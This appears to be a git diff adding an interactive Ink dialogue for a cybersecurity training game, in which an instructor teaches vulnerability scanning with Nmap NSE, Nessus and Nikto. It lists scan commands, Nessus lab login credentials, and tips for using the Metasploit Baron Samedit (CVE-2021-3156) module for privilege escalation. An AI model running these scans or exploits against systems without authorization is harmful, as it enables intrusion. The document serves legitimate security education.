where theory meets practice. + + ~ instructor_rapport += 10 + +- -> vulnerability_hub + +-> END diff --git a/story_design/ink/game_scenarios/vulnerability_analysis.ink b/story_design/ink/game_scenarios/vulnerability_analysis.ink new file mode 100644 index 0000000..0826e37 --- /dev/null +++ b/story_design/ink/game_scenarios/vulnerability_analysis.ink @@ -0,0 +1,562 @@ +// Vulnerability Analysis Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/8_vulnerability_analysis.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR vuln_scanning_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Vulnerability Assessment Specialist: Welcome, Agent {player_name}. I'm your instructor for Vulnerability Analysis and Assessment. + +~ instructor_rapport = 0 +~ vuln_scanning_mastery = 0 + +Vulnerability Assessment Specialist: Vulnerability assessment is critical for efficiently identifying security weaknesses in systems before attackers find them. + +Vulnerability Assessment Specialist: While penetration testing involves manually researching and exploiting vulnerabilities, vulnerability scanning is an automated approach that quickly surveys systems for known security issues. + +Vulnerability Assessment Specialist: You'll learn to use industry-standard tools like Nmap NSE, Nessus, and Nikto - understanding their strengths, limitations, and when to use each. + +Vulnerability Assessment Specialist: Remember: these are powerful reconnaissance tools. Use them only on systems you're authorized to assess. + +~ vuln_scanning_mastery += 10 + +-> vuln_scan_hub + +=== vuln_scan_hub === +Vulnerability Assessment Specialist: What aspect of vulnerability assessment would you like to explore? + ++ [What is vulnerability scanning?] + -> vuln_scanning_intro ++ [Vulnerability scanning vs penetration testing] + -> scanning_vs_pentesting ++ [Nmap Scripting Engine (NSE)] + -> nmap_nse ++ [Using Nessus vulnerability scanner] + -> nessus_scanner ++ [Web vulnerability scanning with Nikto] + -> nikto_scanner ++ [Limitations of automated tools] + -> tool_limitations ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== vuln_scanning_intro === +Vulnerability Assessment Specialist: Vulnerability scanning is an automated approach to identifying security weaknesses in systems. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: Scanners typically perform or import network scans like port scans and service identification, then automatically check whether detected services contain known vulnerabilities. + +Vulnerability Assessment Specialist: They compare detected service versions against databases of known vulnerabilities - similar to what you did manually using CVE databases. + ++ [How do vulnerability scanners work?] + Vulnerability Assessment Specialist: Most vulnerability scanners follow a standard process: + + Vulnerability Assessment Specialist: First, they conduct or import a port scan to identify running services and their versions. + + Vulnerability Assessment Specialist: Then they compare this information against databases of known vulnerabilities for those specific versions. + + Vulnerability Assessment Specialist: Many also send probes to confirm vulnerabilities actually exist, not just assume based on version numbers. + + Vulnerability Assessment Specialist: Some tests are potentially dangerous and might crash services, so most scanners offer a "safe mode" to avoid risky checks. + + ~ instructor_rapport += 5 + ++ [Why use automated scanning?] + Vulnerability Assessment Specialist: Automated scanning has several advantages: + + Vulnerability Assessment Specialist: It's fast - scanning hundreds of systems in the time it would take to manually test one. + + Vulnerability Assessment Specialist: It's comprehensive - checking for thousands of known vulnerabilities systematically. + + Vulnerability Assessment Specialist: It's repeatable - you can regularly rescan to catch newly introduced vulnerabilities. + + Vulnerability Assessment Specialist: It reduces the risk of human error or overlooking obvious issues. + + Vulnerability Assessment Specialist: However, it also has significant limitations we'll discuss. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== scanning_vs_pentesting === +Vulnerability Assessment Specialist: Penetration testing and vulnerability scanning are complementary but distinct approaches. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: Penetration testing involves manual research, planning, and actual exploitation of vulnerabilities. It's deeper but slower. + +Vulnerability Assessment Specialist: Vulnerability scanning is automated, faster, and broader but shallower. + ++ [What are the advantages of penetration testing?] + Vulnerability Assessment Specialist: Penetration testing has several key advantages: + + Vulnerability Assessment Specialist: Very few false positives - if a tester successfully exploits a vulnerability, it's definitely real. + + Vulnerability Assessment Specialist: Testers can chain vulnerabilities together in creative ways automated tools can't imagine. + + Vulnerability Assessment Specialist: Human intuition can spot logical flaws and business logic vulnerabilities that scanners miss. + + Vulnerability Assessment Specialist: However, there's always risk that an exploit may cause unintentional damage. + + Vulnerability Assessment Specialist: And even skilled testers might miss something obvious if they're checking things manually. + + ~ instructor_rapport += 5 + ++ [What are the advantages of vulnerability scanning?] + Vulnerability Assessment Specialist: Vulnerability scanning excels at: + + Vulnerability Assessment Specialist: Speed - scanning entire networks in hours instead of days or weeks. + + Vulnerability Assessment Specialist: Coverage - systematically checking for thousands of known vulnerabilities. + + Vulnerability Assessment Specialist: Safety - tests can be configured to avoid dangerous probes that might crash services. + + Vulnerability Assessment Specialist: Consistency - same tests run the same way every time. + + Vulnerability Assessment Specialist: Cost-effectiveness - after initial setup, scanning is cheap to repeat regularly. + + ~ instructor_rapport += 5 + ++ [Which approach is better?] + Vulnerability Assessment Specialist: The best security assessments use both! + + Vulnerability Assessment Specialist: Start with vulnerability scanning to quickly identify low-hanging fruit and obvious issues. + + Vulnerability Assessment Specialist: Then use penetration testing to go deeper, verify critical findings, and test how vulnerabilities can be chained together. + + Vulnerability Assessment Specialist: Many organizations do frequent vulnerability scans with periodic penetration tests. + + Vulnerability Assessment Specialist: Think of scanning as your smoke detector, and penetration testing as your fire drill. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== nmap_nse === +Vulnerability Assessment Specialist: The Nmap Scripting Engine (NSE) extends Nmap's capabilities beyond simple port scanning. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: NSE allows Nmap to be extended with scripts that add service detection, vulnerability checking, and even exploitation capabilities. + +Vulnerability Assessment Specialist: Nmap is distributed with hundreds of scripts written in the Lua programming language. + ++ [How do I use Nmap scripts?] + Vulnerability Assessment Specialist: The simplest way is to use the default script set: + + Vulnerability Assessment Specialist: nmap -sC TARGET + + Vulnerability Assessment Specialist: This runs all scripts categorized as "default" - safe, useful, and not overly intrusive. + + Vulnerability Assessment Specialist: For vulnerability scanning specifically: nmap --script vuln -sV TARGET + + Vulnerability Assessment Specialist: The vuln category includes scripts that check for known vulnerabilities. + + Vulnerability Assessment Specialist: You can also run specific scripts: nmap --script distcc-cve2004-2687 TARGET + + ~ instructor_rapport += 5 + ++ [Where are NSE scripts located?] + Vulnerability Assessment Specialist: All NSE scripts are stored in /usr/share/nmap/scripts/ + + Vulnerability Assessment Specialist: You can list them with: ls /usr/share/nmap/scripts/ + + Vulnerability Assessment Specialist: Each script is a .nse file. Looking at their code shows what they check for. + + Vulnerability Assessment Specialist: For example, distcc-cve2004-2687.nse checks for the specific Distcc vulnerability. + + Vulnerability Assessment Specialist: The scripts are organized by category: auth, broadcast, default, discovery, dos, exploit, fuzzer, intrusive, malware, safe, version, and vuln. + + ~ instructor_rapport += 5 + ++ [How effective is NSE for vulnerability detection?] + Vulnerability Assessment Specialist: NSE vulnerability detection is useful but limited. + + Vulnerability Assessment Specialist: The vuln scripts check for specific, well-known vulnerabilities - they're not comprehensive like dedicated vulnerability scanners. + + Vulnerability Assessment Specialist: However, they're very useful for quick checks and are actively maintained by the Nmap community. + + Vulnerability Assessment Specialist: Think of NSE as a lightweight vulnerability scanner - good for initial assessment but not a replacement for tools like Nessus. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== nessus_scanner === +Vulnerability Assessment Specialist: Nessus by Tenable is one of the most popular commercial vulnerability scanners in the industry. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: It uses a client-server architecture with a web interface, and can scan for tens of thousands of vulnerabilities. + +Vulnerability Assessment Specialist: Vulnerability tests are written in NASL (Nessus Attack Scripting Language), and subscribers receive regular updates to vulnerability signatures. + ++ [How do I use Nessus?] + Vulnerability Assessment Specialist: Access Nessus through its web interface at https://localhost:8834 + + Vulnerability Assessment Specialist: Login with the credentials provided (typically nessusadmin) + + Vulnerability Assessment Specialist: Click "New Scan" and choose a scan template - Basic Network Scan is a good starting point. + + Vulnerability Assessment Specialist: Enter your target IP addresses and click "Launch" + + Vulnerability Assessment Specialist: Nessus will systematically test the targets and present results categorized by severity: Critical, High, Medium, Low, Info. + + ~ instructor_rapport += 5 + ++ [What scan templates does Nessus offer?] + Vulnerability Assessment Specialist: Nessus offers various scan profiles for different purposes: + + Vulnerability Assessment Specialist: Basic Network Scan - Good general-purpose scan for network services + + Vulnerability Assessment Specialist: Advanced Scan - Allows detailed customization of what to check + + Vulnerability Assessment Specialist: Web Application Tests - Focused on web vulnerabilities + + Vulnerability Assessment Specialist: Compliance scans - Check systems against security policy standards + + Vulnerability Assessment Specialist: Each template determines which vulnerability checks run and how aggressive the scanning is. + + ~ instructor_rapport += 5 + ++ [How do I interpret Nessus results?] + Vulnerability Assessment Specialist: Nessus presents results with detailed information for each finding: + + Vulnerability Assessment Specialist: Severity rating (Critical to Info) helps prioritize remediation + + Vulnerability Assessment Specialist: CVE identifiers link to official vulnerability databases + + Vulnerability Assessment Specialist: Plugin descriptions explain what was found and why it's a problem + + Vulnerability Assessment Specialist: Solution sections provide remediation guidance + + Vulnerability Assessment Specialist: References link to additional information and exploit code + + Vulnerability Assessment Specialist: You can export results as HTML, PDF, or XML for reports or import into Metasploit. + + ~ instructor_rapport += 5 + ++ [What's the difference between Basic and Advanced scans?] + Vulnerability Assessment Specialist: Basic scans use default settings optimized for speed and safety. + + Vulnerability Assessment Specialist: Advanced scans let you customize: + + Vulnerability Assessment Specialist: Which vulnerability checks to run + + Vulnerability Assessment Specialist: Whether to perform "thorough tests" (slower but more comprehensive) + + Vulnerability Assessment Specialist: Whether to show potential false alarms + + Vulnerability Assessment Specialist: Advanced scans typically find more vulnerabilities but take longer and carry slightly higher risk of disruption. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== nikto_scanner === +Vulnerability Assessment Specialist: Nikto is a command-line web vulnerability scanner focused exclusively on web servers and applications. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: While general scanners like Nmap and Nessus check web servers, Nikto specializes in web-specific vulnerabilities. + +Vulnerability Assessment Specialist: It scans for over 6,000 web security issues including dangerous CGI scripts, misconfigurations, and known vulnerable software. + ++ [How do I use Nikto?] + Vulnerability Assessment Specialist: Nikto is straightforward to use: + + Vulnerability Assessment Specialist: nikto -host TARGET_IP + + Vulnerability Assessment Specialist: Nikto will automatically detect web servers on common ports and scan them. + + Vulnerability Assessment Specialist: You can also specify a port: nikto -host TARGET_IP -port 8080 + + Vulnerability Assessment Specialist: Or scan SSL/TLS sites: nikto -host TARGET_IP -ssl + + Vulnerability Assessment Specialist: The output shows each issue found with references to more information. + + ~ instructor_rapport += 5 + ++ [What kinds of issues does Nikto detect?] + Vulnerability Assessment Specialist: Nikto looks for web-specific vulnerabilities: + + Vulnerability Assessment Specialist: Outdated server software with known exploits + + Vulnerability Assessment Specialist: Dangerous default files and directories (admin panels, config files) + + Vulnerability Assessment Specialist: Server misconfigurations (directory listings, verbose errors) + + Vulnerability Assessment Specialist: Known vulnerable web applications and frameworks + + Vulnerability Assessment Specialist: Interesting HTTP headers that might reveal information + + ~ instructor_rapport += 5 + ++ [How does Nikto compare to Nessus for web scanning?] + Vulnerability Assessment Specialist: Nikto and Nessus overlap but have different strengths: + + Vulnerability Assessment Specialist: Nikto is specialized - it goes deeper on web-specific issues. + + Vulnerability Assessment Specialist: Nessus is broader - it checks web servers along with everything else. + + Vulnerability Assessment Specialist: Nikto is free and open source; Nessus commercial versions are quite expensive. + + Vulnerability Assessment Specialist: For comprehensive web testing, use both! They often find different issues. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== tool_limitations === +Vulnerability Assessment Specialist: Understanding the limitations of automated tools is crucial for effective security assessment. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: No single tool finds everything. Different tools detect different vulnerabilities based on their databases and testing methods. + +Vulnerability Assessment Specialist: All automated tools produce false positives and false negatives. + ++ [What are false positives and false negatives?] + Vulnerability Assessment Specialist: False positives are vulnerabilities reported that don't actually exist. + + Vulnerability Assessment Specialist: For example, a scanner might think software is vulnerable based on version number, but a patch was backported. + + Vulnerability Assessment Specialist: False negatives are real vulnerabilities that scanners miss completely. + + Vulnerability Assessment Specialist: This happens when vulnerabilities aren't in the scanner's database, or tests aren't configured to detect them. + + Vulnerability Assessment Specialist: Penetration testing helps confirm scanner findings and find what was missed. + + ~ instructor_rapport += 5 + ++ [Why don't scanners detect all vulnerabilities?] + Vulnerability Assessment Specialist: Several factors limit scanner effectiveness: + + Vulnerability Assessment Specialist: Signature-based detection only finds KNOWN vulnerabilities in their databases. + + Vulnerability Assessment Specialist: Zero-day vulnerabilities (unknown to vendors) won't be detected. + + Vulnerability Assessment Specialist: Configuration issues and logical flaws often can't be detected automatically. + + Vulnerability Assessment Specialist: Scanners might not test certain services if they're on non-standard ports. + + Vulnerability Assessment Specialist: Safe mode settings might skip tests that could confirm vulnerabilities. + + ~ instructor_rapport += 5 + ++ [How can different scanners miss different things?] + Vulnerability Assessment Specialist: Each scanner has different vulnerability databases and detection methods: + + Vulnerability Assessment Specialist: Nmap NSE has a limited set of vulnerability scripts focused on network services. + + Vulnerability Assessment Specialist: Nessus has an extensive database of checks but might not detect web-specific issues. + + Vulnerability Assessment Specialist: Nikto specializes in web vulnerabilities but doesn't check other services. + + Vulnerability Assessment Specialist: This is why security professionals run multiple scanners - each catches things others miss. + + Vulnerability Assessment Specialist: Even then, manual testing is essential to find what all the scanners missed! + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== commands_reference === +Vulnerability Assessment Specialist: Let me provide a comprehensive vulnerability scanning commands reference. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: **Nmap NSE Scanning:** + +Vulnerability Assessment Specialist: Default script scan: nmap -sC TARGET + +Vulnerability Assessment Specialist: Vulnerability scripts: nmap --script vuln -sV TARGET + +Vulnerability Assessment Specialist: Specific ports: nmap --script vuln -sV -p 1-5000 TARGET + +Vulnerability Assessment Specialist: Specific script: nmap --script distcc-cve2004-2687 TARGET + +Vulnerability Assessment Specialist: List available scripts: ls /usr/share/nmap/scripts/ + +Vulnerability Assessment Specialist: View script code: cat /usr/share/nmap/scripts/SCRIPT_NAME.nse + ++ [Show me Nessus workflow] + Vulnerability Assessment Specialist: **Nessus Scanning:** + + Vulnerability Assessment Specialist: Access web interface: https://localhost:8834 + + Vulnerability Assessment Specialist: Login: nessusadmin / nessusadmin01 + + Vulnerability Assessment Specialist: **Workflow:** + + Vulnerability Assessment Specialist: 1. Click "New Scan" + + Vulnerability Assessment Specialist: 2. Select scan template (Basic Network Scan or Advanced Scan) + + Vulnerability Assessment Specialist: 3. Enter scan name and target IP addresses + + Vulnerability Assessment Specialist: 4. For Advanced scans, configure: Thorough tests, Show potential false alarms + + Vulnerability Assessment Specialist: 5. Click "Save" then "Launch" + + Vulnerability Assessment Specialist: 6. View results: Click scan name → "Vulnerabilities" tab + + Vulnerability Assessment Specialist: 7. Export results: "Export" → choose format (HTML, PDF, CSV, XML) + + ~ instructor_rapport += 3 + ++ [Show me Nikto commands] + Vulnerability Assessment Specialist: **Nikto Web Scanning:** + + Vulnerability Assessment Specialist: Basic scan: nikto -host TARGET_IP + + Vulnerability Assessment Specialist: Specific port: nikto -host TARGET_IP -port 8080 + + Vulnerability Assessment Specialist: SSL/HTTPS: nikto -host TARGET_IP -ssl + + Vulnerability Assessment Specialist: Multiple ports: nikto -host TARGET_IP -port 80,443,8080 + + Vulnerability Assessment Specialist: **Tips:** + + Vulnerability Assessment Specialist: Output can be verbose - redirect to file: nikto -host TARGET > nikto_results.txt + + Vulnerability Assessment Specialist: Check specific paths: nikto -host TARGET -root /admin/ + + ~ instructor_rapport += 3 + ++ [Show me comparison workflow] + Vulnerability Assessment Specialist: **Comprehensive Assessment Workflow:** + + Vulnerability Assessment Specialist: 1. Start with Nmap service detection: nmap -sV -p- TARGET + + Vulnerability Assessment Specialist: 2. Run Nmap vuln scripts: nmap --script vuln -sV TARGET + + Vulnerability Assessment Specialist: 3. Launch Nessus Basic scan for broad coverage + + Vulnerability Assessment Specialist: 4. Launch Nessus Advanced scan with thorough tests + + Vulnerability Assessment Specialist: 5. For web servers, run Nikto: nikto -host TARGET + + Vulnerability Assessment Specialist: 6. Compare results - note what each tool found uniquely + + Vulnerability Assessment Specialist: 7. Verify critical findings with manual testing or exploitation + + ~ instructor_rapport += 3 + +- -> vuln_scan_hub + +=== challenge_tips === +Vulnerability Assessment Specialist: Let me give you practical tips for the vulnerability assessment challenges. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: **Running Scans:** + +Vulnerability Assessment Specialist: Start Nmap vuln scans early - they take time to complete. + +Vulnerability Assessment Specialist: While Nmap runs, start your Nessus scans in parallel. + +Vulnerability Assessment Specialist: If Nessus is still initializing plugins, skip ahead to Nikto and come back. + ++ [Tips for comparing results?] + Vulnerability Assessment Specialist: Document what each tool finds: + + Vulnerability Assessment Specialist: Note which vulnerabilities Nmap NSE detects + + Vulnerability Assessment Specialist: Count vulnerabilities by severity in Nessus (Critical, High, Medium, Low) + + Vulnerability Assessment Specialist: Compare Basic vs Advanced Nessus scans - how many more does Advanced find? + + Vulnerability Assessment Specialist: Check what Nikto finds that the others missed + + Vulnerability Assessment Specialist: The lab has MULTIPLE exploitable vulnerabilities - see how many each tool detects. + + ~ instructor_rapport += 5 + ++ [Tips for exploiting found vulnerabilities?] + Vulnerability Assessment Specialist: The lab includes vulnerabilities you've seen before (like Distcc) and new ones. + + Vulnerability Assessment Specialist: Try exploiting vulnerabilities detected by the scanners to confirm they're real. + + Vulnerability Assessment Specialist: There's a NEW privilege escalation vulnerability this week - a different sudo vulnerability. + + Vulnerability Assessment Specialist: This time you don't know the user's password, so the previous sudo exploit won't work! + + Vulnerability Assessment Specialist: Look for CVE-2021-3156 (Baron Samedit) - affects sudo versions 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1 + + ~ instructor_rapport += 5 + ++ [Tips for privilege escalation?] + Vulnerability Assessment Specialist: After exploiting a service, check the sudo version: sudo --version + + Vulnerability Assessment Specialist: The Baron Samedit vulnerability (CVE-2021-3156) might be present. + + Vulnerability Assessment Specialist: This exploit works differently - it doesn't require knowing a password! + + Vulnerability Assessment Specialist: You may need to upgrade your shell to Meterpreter first to use the Metasploit exploit. + + Vulnerability Assessment Specialist: Search Metasploit: search baron_samedit or search CVE-2021-3156 + + Vulnerability Assessment Specialist: Use: exploit/linux/local/sudo_baron_samedit + + ~ instructor_rapport += 5 + ++ [Troubleshooting tips?] + Vulnerability Assessment Specialist: If Nessus gives API access errors, clear your browser cache (Ctrl+Shift+Delete) + + Vulnerability Assessment Specialist: If you can't access a web server, check Firefox proxy settings - disable the proxy or add exclusion for 10.*.*.* + + Vulnerability Assessment Specialist: Some vulnerable services might be patched - try attacking all available services. + + Vulnerability Assessment Specialist: Nessus scans can take 15-30 minutes - be patient! + + Vulnerability Assessment Specialist: Compare results across all tools to see their different strengths and blind spots. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== ready_for_practice === +Vulnerability Assessment Specialist: Excellent! You're ready for comprehensive vulnerability assessment. + +~ instructor_rapport += 10 +~ vuln_scanning_mastery += 10 + +Vulnerability Assessment Specialist: You'll use multiple industry-standard tools to assess the same target and compare their effectiveness. + +Vulnerability Assessment Specialist: This lab demonstrates an important lesson: no single tool catches everything. Layer your defenses and your assessments! + +Vulnerability Assessment Specialist: Remember: vulnerability scanners are reconnaissance tools. Use them only on authorized targets. + ++ [Any final advice?] + Vulnerability Assessment Specialist: Be systematic. Run all the tools, document findings, and compare results. + + Vulnerability Assessment Specialist: Pay attention to what each tool finds that others miss - this teaches you their strengths and weaknesses. + + Vulnerability Assessment Specialist: Don't just collect scan results - verify critical findings by actually exploiting them. + + Vulnerability Assessment Specialist: The limitations of these tools are as important as their capabilities. Real attackers won't stop at what scanners find. + + Vulnerability Assessment Specialist: Take notes on severity ratings, CVE numbers, and remediation advice - these make great report content. + + Vulnerability Assessment Specialist: Good luck, Agent {player_name}. Time to see what automated tools can and can't detect! + + ~ instructor_rapport += 10 + +- -> vuln_scan_hub + +-> END